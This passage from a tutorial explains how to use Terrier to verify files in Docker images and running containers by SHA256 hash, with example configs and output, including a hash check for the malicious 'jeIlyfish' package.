<code>82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd</code></p> <p>Now that we have a hash, we can use this hash to determine if the Golang binary is in the image <code>myImage.tar</code>. To achieve this, we need to populate a configuration file for Terrier. Terrier makes use of YAML configuration files and below is our config file that we save as <code>cfg.yml</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">image</span> <span class="na">image</span><span class="pi">:</span> <span class="s">myImage.tar</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd'</span> </code></pre> </div> <p>The config file above has multiple entries which allow us to specify the <code>mode</code> that Terrier will operate in and in this case, we are working with an image file (tar archive) so the mode is <code>image</code>. The image file we are working with is <code>myImage.tar</code> and the hash we are looking to identify is in the <code>hashes</code> list.</p> <p>We are now ready to run Terrier and this can be done with the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier </code></pre> </div> <p>The command above should result in output similar to the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="o">[</span>+] Loading config: cfg.yml <span class="o">[</span>+] Analysing Image <span class="o">[</span>+] Docker Image Source: myImage.tar <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[!]</span> Found file <span class="s1">'6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759/usr/local/go/bin/go'</span> with <span class="nb">hash</span>: 82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c </code></pre> </div> <p>We have identified a file <code>/usr/local/go/bin/go</code> located at layer <code>6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759</code> that has the same SHA256 hash as the one we provided. We now have verification that the image “myImage.tar” contains a file with the SHA256 hash we provided.</p> <p>This example can be extended upon and you can instruct Terrier to search for multiple hashes. In this case, we are going to search for a malicious file. Recently a malicious Python library was identified in the wild and went by the name “Jeilyfish”. Terrier could be used to check if a Docker image of yours contained this malicious package. To do this, we can determine the SHA256 of one of the malicious Python files that contains the backdoor:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span><span class="nb">cat </span>jeIlyfish-0.7.1/jeIlyfish/_jellyfish.py | <span class="nb">sha256sum </span>cf734865dd344cd9b0b349cdcecd83f79a751150b5fd4926f976adddb93d902c </code></pre> </div> <p>We then update our Terrier config to include the hash calculated above.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">image</span> <span class="na">image</span><span class="pi">:</span> <span class="s">myImage.tar</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd'</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">cf734865dd344cd9b0b349cdcecd83f79a751150b5fd4926f976adddb93d902c'</span> </code></pre> </div> <p>We then run Terrier against and analyse the results:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="o">[</span>+] Loading config: cfg.yml <span class="o">[</span>+] Analysing Image <span class="o">[</span>+] Docker Image Source: myImage.tar <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[!]</span> Found file <span class="s1">'6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759/usr/local/go/bin/go'</span> with <span class="nb">hash</span>: 82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c </code></pre> </div> <p>The results above indicate that our image did not contain the malicious Python package.</p> <p>There is no limit as to how many hashes you can search for however it should be noted that Terrier performs all its actions in-memory for performance reasons so you might hit certain limits if you do not have enough accessible memory.</p> <h3> Identifying and verifying specific files in OCI images </h3> <p>Terrier can also be used to determine if a specific image contains a specific file <em>at a specific location</em>. This can be useful to ensure that an image is using a specific component i.e binary, shared object or dependency. This can also be seen as “pinning” components by ensuring that you are images are using specific components i.e a specific version of cURL.</p> <p>In order to do this, you need the following:</p> <ol> <li>An OCI Image i.e TAR archive</li> <li>A SHA256 hash of a specific file/s</li> <li>The path and name of the specific file/s</li> </ol> <p>The first point can be easily achieved with Docker by using the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>docker save imageid <span class="nt">-o</span> myImage.tar </code></pre> </div> <p>The command above utilises a Docker image id which can be obtained using the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>docker images </code></pre> </div> <p>Once you have your image exported as a tar archive, you will need to determine the path of the file you would like to identify and verify in the image. For example, if we would like to ensure that our images are making use of a specific version of cURL, we can run the following commands in a container or some other environment that resembles the image.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>which curl /usr/bin/curl </code></pre> </div> <p>We now have the path to cURL and can now generate the SHA256 of this instance of cURL because in this case, we trust this instance of cURL. We could determine the hash by other means for example many binaries are released with a corresponding hash from the developer which can be acquired from the developer’s website.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span><span class="nb">cat</span> /usr/bin/curl | <span class="nb">sha256sum </span>9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96 </code></pre> </div> <p>With this information, we can now populate our config file for Terrier:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">image</span> <span class="na">image</span><span class="pi">:</span> <span class="s">myImage.tar</span> <span class="na">files</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/usr/bin/curl'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'</span> </code></pre> </div> <p>We’ve saved the above config as <code>cfg.yml</code> and when we run Terrier with this config, we get the following output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="o">[</span>+] Loading config: cfg.yml <span class="o">[</span>+] Analysing Image <span class="o">[</span>+] Docker Image Source: myImage.tar <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c <span class="o">[!]</span> All components were identified: <span class="o">(</span>1/1<span class="o">)</span> <span class="o">[!]</span> All components were identified and verified: <span class="o">(</span>1/1<span class="o">)</span> <span class="nv">$ </span><span class="nb">echo</span> <span class="nv">$?</span> 0 </code></pre> </div> <p>The output above indicates that the file <code>/usr/bin/curl</code> was successfully identified and verified, meaning that the image contained a file at the location <code>/usr/bin/curl</code> and that the SHA256 of that file matched the hash we provided in the config. Terrier also makes use of return codes and if we analyse the return code from the output above, we can see that the value is <code>0</code> which indicates a success. If Terrier cannot identify or verify all the provided files, a return code of <code>1</code> is returned which indicates a failure. The setting of return codes is particularly useful in testing environments or CI/CD environments.</p> <p>We can also run Terrier with verbose mode enable to get more information:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="o">[</span>+] Loading config: cfg.yml <span class="o">[</span>+] Analysing Image <span class="o">[</span>+] Docker Image Source: myImage.tar <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[!]</span> Identified instance of <span class="s1">'/usr/bin/curl'</span> at: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560/usr/bin/curl <span class="o">[!]</span> Verified matching instance of <span class="s1">'/usr/bin/curl'</span> at: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560/usr/bin/curl with <span class="nb">hash</span>: 9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c <span class="o">[!]</span> All components were identified: <span class="o">(</span>1/1<span class="o">)</span> <span class="o">[!]</span> All components were identified and verified: <span class="o">(</span>1/1<span class="o">)</span> </code></pre> </div> <p>The output above provides some more detailed information such as which layer the cURL files was located at. If you wanted more information, you could enable the <strong>veryveryverbose</strong> option in the config file but beware, this is a lot of output and grep will be your friend.</p> <p>There is no limit for how many hashes you can specify for a file. This can be useful for when you want to allow more than one version of a specific file i.e multiple versions of cURL. An example config of multiple hashes for a file might look like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">image</span> <span class="na">image</span><span class="pi">:</span> <span class="s">myImage.tar</span> <span class="na">files</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/usr/bin/curl'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">9a43cb726fef31f272333b236ff1fde4beab363af54d0bc99c304450065d9c96'</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545'</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759'</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c'</span> </code></pre> </div> <p>The config above allows Terrier to verify if the identified cURL instance is one of the provided hashes. There is also no limit for the amount of files Terrier can attempt to identify and verify.</p> <p>Terrier’s Github repo also contains a useful script called <code>convertSHA.sh</code> which can be used to convert a list of SHA256 hashes and filenames into a Terrier config file. This is useful when converting the output from other tools into a Terrier friendly format. For example, we could have the following contents of a file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>8946690bfe12308e253054ea658b1552c02b67445763439d1165c512c4bc240d ./bin/uname 6de8254cfd49543097ae946c303602ffd5899b2c88ec27cfcd86d786f95a1e92 ./bin/gzexe 74ff9700d623415bc866c013a1d8e898c2096ec4750adcb7cd0c853b4ce11c04 ./bin/wdctl 61c779de6f1b9220cdedd7dfee1fa4fb44a4777fff7bd48d12c21efb87009877 ./bin/dmesg 7bdde142dc5cb004ab82f55adba0c56fc78430a6f6b23afd33be491d4c7c238b ./bin/which 3ed46bd8b4d137cad2830974a78df8d6b1d28de491d7a23d305ad58742a07120 ./bin/mknod e8ca998df296413624b2bcf92a31ee3b9852f7590f759cc4a8814d3e9046f1eb ./bin/mv a91d40b349e2bccd3c5fe79664e70649ef0354b9f8bd4658f8c164f194b53d0f ./bin/chown 091abe52520c96a75cf7d4ff38796fc878cd62c3a75a3fd8161aa3df1e26bebd ./bin/uncompress c5ebd611260a9057144fd1d7de48dbefc14e16240895cb896034ae05a94b5750 ./bin/echo d4ba9ffb5f396a2584fec1ca878930b677196be21aee16ee6093eb9f0a93bf8f ./bin/df 5fb515ff832650b2a25aeb9c21f881ca2fa486900e736dfa727a5442a6de83e5 ./bin/tar 6936c9aa8e17781410f286bb1cbc35b5548ea4e7604c1379dc8e159d91a0193d ./bin/zforce 8d641329ea7f93b1caf031b70e2a0a3288c49a55c18d8ba86cc534eaa166ec2e ./bin/gzip 0c1a1f53763ab668fb085327cdd298b4a0c1bf2f0b51b912aa7bc15392cd09e7 ./bin/su 20c358f7ee877a3fd2138ecce98fada08354810b3e9a0e849631851f92d09cc4 ./bin/bzexe 01764d96697b060b2a449769073b7cf2df61b5cb604937e39dd7a47017e92ee0 ./bin/znew 0d1a106dc28c3c41b181d3ba2fc52086ede4e706153e22879e60e7663d2f6aad ./bin/login fb130bda68f6a56e2c2edc3f7d5b805fd9dcfbcc26fb123a693b516a83cfb141 ./bin/dir 0e7ca63849eebc9ea476ea1fefab05e60b0ac8066f73c7d58e8ff607c941f212 ./bin/bzmore 14dc8106ec64c9e2a7c9430e1d0bef170aaad0f5f7f683c1c1810b466cdf5079 ./bin/zless 9cf4cda0f73875032436f7d5c457271f235e59c968c1c101d19fc7bf137e6e37 ./bin/chmod c5f12f157b605b1141e6f97796732247a26150a0a019328d69095e9760b42e38 ./bin/sleep b9711301d3ab42575597d8a1c015f49fddba9a7ea9934e11d38b9ff5248503a8 ./bin/zfgrep 0b2840eaf05bb6802400cc5fa793e8c7e58d6198334171c694a67417c687ffc7 ./bin/stty d9393d0eca1de788628ad0961b74ec7a648709b24423371b208ae525f60bbdad ./bin/bunzip2 d2a56d64199e674454d2132679c0883779d43568cd4c04c14d0ea0e1307334cf ./bin/mkdir 1c48ade64b96409e6773d2c5c771f3b3c5acec65a15980d8dca6b1efd3f95969 ./bin/cat 09198e56abd1037352418279eb51898ab71cc733642b50bcf69d8a723602841e ./bin/true 97f3993ead63a1ce0f6a48cda92d6655ffe210242fe057b8803506b57c99b7bc ./bin/zdiff 0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c ./bin/ls da2da96324108bbe297a75e8ebfcb2400959bffcdaa4c88b797c4d0ce0c94c50 ./bin/zegrep </code></pre> </div> <p>The file contents above are trusted SHA256 hashes for specific files. If we would like to use this list for ensuring that a particular image is making use of the files listed above, we can do the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./convertSHA.sh trustedhashes.txt terrier.yml </code></pre> </div> <p>The script above takes the input file <code>trustedhashes.txt</code> which contains our trusted hashes listed above and converts them into a Terrier friendly config file called <code>terrier.yml</code> which looks like the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">image</span> <span class="na">image</span><span class="pi">:</span> <span class="s">myImage.tar</span> <span class="na">files</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/bin/uname'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">8946690bfe12308e253054ea658b1552c02b67445763439d1165c512c4bc240d'</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/bin/gzexe'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">6de8254cfd49543097ae946c303602ffd5899b2c88ec27cfcd86d786f95a1e92'</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/bin/wdctl'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">74ff9700d623415bc866c013a1d8e898c2096ec4750adcb7cd0c853b4ce11c04'</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/bin/dmesg'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">61c779de6f1b9220cdedd7dfee1fa4fb44a4777fff7bd48d12c21efb87009877'</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/bin/which'</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">7bdde142dc5cb004ab82f55adba0c56fc78430a6f6b23afd33be491d4c7c238b'</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s1">'</span><span class="s">/bin/mknod'</span> </code></pre> </div> <p>The config file <code>terrier.yml</code> is ready to be used:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="nt">-cfg</span><span class="o">=</span>terrier.yml <span class="o">[</span>+] Loading config: terrier.yml <span class="o">[</span>+] Analysing Image <span class="o">[</span>+] Docker Image Source: myImage.tar <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c <span class="o">[!]</span> Not all components were identifed: <span class="o">(</span>4/31<span class="o">)</span> <span class="o">[!]</span> Component not identified: /bin/uncompress <span class="o">[!]</span> Component not identified: /bin/bzexe <span class="o">[!]</span> Component not identified: /bin/bzmore <span class="o">[!]</span> Component not identified: /bin/bunzip2 <span class="nv">$ </span><span class="nb">echo</span> <span class="nv">$?</span> 1 </code></pre> </div> <p>As we can see from the output above, Terrier was unable to identify 4/31 of the components provided in the config. The return code is also 1 which indicates a failure. If we were to remove the components that are not in the provided image, the output from the previous command would look like the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>./terrier <span class="nt">-cfg</span><span class="o">=</span>terrier.yml <span class="o">[</span>+] Loading config: terrier.yml <span class="o">[</span>+] Analysing Image <span class="o">[</span>+] Docker Image Source: myImage.tar <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 34a9e0f17132202a82565578a3c2dae1486bb198cde76928c8c2c5c461e11ccf <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6539a80dd09da08132a525494ff97e92f4148d413e7c48b3583883fda8a40560 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: 6d2d61c78a65b6e6c82b751a38727da355d59194167b28b3f8def198cd116759 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: a6e646c34d2d2c2f4ab7db95e4c9f128721f63c905f107887839d3256f1288e1 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: aefc8f0c87a14230e30e510915cbbe13ebcabd611e68db02b050b6ceccf9c545 <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: d4468fff8d0f28d87d48f51fc0a6afd4b38946bbbe91480919ebfdd55e43ce8c <span class="o">[</span><span class="k">*</span><span class="o">]</span> Inspecting Layer: dbf9da5e4e5e1ecf9c71452f6b67b2b0225cec310a20891cc5dedbfd4ead667c <span class="o">[!]</span> All components were identified: <span class="o">(</span>27/27<span class="o">)</span> <span class="o">[!]</span> Not all components were verified: <span class="o">(</span>26/27<span class="o">)</span> <span class="o">[!]</span> Component not verified: /bin/cat <span class="o">[!]</span> Component not verified: /bin/chmod <span class="o">[!]</span> Component not verified: /bin/chown <span class="o">[!]</span> Component not verified: /bin/df <span class="o">[!]</span> Component not verified: /bin/dir <span class="o">[!]</span> Component not verified: /bin/dmesg <span class="o">[!]</span> Component not verified: /bin/echo <span class="o">[!]</span> Component not verified: /bin/gzexe <span class="o">[!]</span> Component not verified: /bin/gzip <span class="o">[!]</span> Component not verified: /bin/login <span class="o">[!]</span> Component not verified: /bin/ls <span class="o">[!]</span> Component not verified: /bin/mkdir <span class="o">[!]</span> Component not verified: /bin/mknod <span class="o">[!]</span> Component not verified: /bin/mv <span class="o">[!]</span> Component not verified: /bin/sleep <span class="o">[!]</span> Component not verified: /bin/stty <span class="o">[!]</span> Component not verified: /bin/su <span class="o">[!]</span> Component not verified: /bin/tar <span class="o">[!]</span> Component not verified: /bin/true <span class="o">[!]</span> Component not verified: /bin/uname <span class="o">[!]</span> Component not verified: /bin/wdctl <span class="o">[!]</span> Component not verified: /bin/zdiff <span class="o">[!]</span> Component not verified: /bin/zfgrep <span class="o">[!]</span> Component not verified: /bin/zforce <span class="o">[!]</span> Component not verified: /bin/zless <span class="o">[!]</span> Component not verified: /bin/znew <span class="nv">$ </span><span class="nb">echo</span> <span class="nv">$?</span> 1 </code></pre> </div> <p>The output above indicates that Terrier was able to identify all the components provided but many were not verifiable, the hashes did not match and once again, the return code is <code>1</code> to indicate this failure.</p> <h3> Identifying files in containers </h3> <p>The previous sections focused on identifying files in images, which can be referred to as a form of “static analysis,” however it is also possible to perform this analysis to running containers. In order to do this, you need the following:</p> <ol> <li>Location of the container’s <code>merged</code> folder </li> <li>A SHA256 hash of a specific file/s</li> </ol> <p>The <code>merged</code> folder is Docker specific, in this case, we are using it because this is where the contents of the Docker container reside, this might be another location if it were LXC.</p> <p>The location of the container’s <code>merged</code> folder can be determined by running the following commands. First obtain the container’s ID:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES b9e676fd7b09 golang <span class="s2">"bash"</span> 20 hours ago Up 20 hours cocky_robinson </code></pre> </div> <p>Once you have the container’s ID, you can run the following command which will help you identify the location of the container’s <code>merged</code> folder on the underlying host.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>docker <span class="nb">exec </span>b9e676fd7b09 mount | <span class="nb">grep </span>diff overlay on / <span class="nb">type </span>overlay <span class="o">(</span>rw,relatime,lowerdir<span class="o">=</span>/var/lib/docker/overlay2/l/7ZDEFE6PX4C3I3LGIGGI5MWQD4: /var/lib/docker/overlay2/l/EZNIFFIXOVO2GIT5PTBI754HC4:/var/lib/docker/overlay2/l/UWKXP76FVZULHGRKZMVYJHY5IK: /var/lib/docker/overlay2/l/DTQQUTRXU4ZLLQTMACWMJYNRTH:/var/lib/docker/overlay2/l/R6DE2RY63EJABTON6HVSFRFICC: /var/lib/docker/overlay2/l/U4JNTFLQEKMFHVEQJ5BQDLL7NO:/var/lib/docker/overlay2/l/FEBURQY25XGHJNPSFY5EEPCFKA: /var/lib/docker/overlay2/l/ICNMAZ44JY5WZQTFMYY4VV6OOZ, <span class="nv">upperdir</span><span class="o">=</span>/var/lib/docker/overlay2/04f84ddd30a7df7cd3f8b1edeb4fb89d476ed84cf3f76d367e4ebf22cd1978a4/diff, <span class="nv">workdir</span><span class="o">=</span>/var/lib/docker/overlay2/04f84ddd30a7df7cd3f8b1edeb4fb89d476ed84cf3f76d367e4ebf22cd1978a4/work<span class="o">)</span> </code></pre> </div> <p>From the results above, we are interested in two entries, <code>upperdir</code> and <code>workdir</code> because these two entries will provide us with the path to the container’s <code>merged</code> folder. From the results above, we can determine that the container’s <code>merged</code> directory is located at <code>/var/lib/docker/overlay2/04f84ddd30a7df7cd3f8b1edeb4fb89d476ed84cf3f76d367e4ebf22cd1978a4/</code> on the underlying host.</p> <p>Now that we have the location, we need some files to identify and in this case, we are going to reuse the SHA256 hashes from the previous section. Let’s now go ahead and populate our Terrier configuration with this new information.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">mode</span><span class="pi">:</span> <span class="s">container</span> <span class="na">path</span><span class="pi">:</span> <span class="s">merged</span> <span class="c1">#image: myImage.tar</span> <span class="na">hashes</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">82bce4b98d7aaeb4f841a36f7141d540bb049f89219f9e377245a91dd3ff92dd'</span> <span class="pi">-</span> <span class="na">hash</span><span class="pi">:</span> <span class="s1">'</span><span class="s">cf734865dd344cd9b0b349cdcecd83f79a751150b5fd4926f976adddb93d902c'</span> </code></pre> </div> <p>The configuration above shows that we have changed the <code>mode</code> from <code>image</code> to <code>container</code> and we have added the <code>path</code> 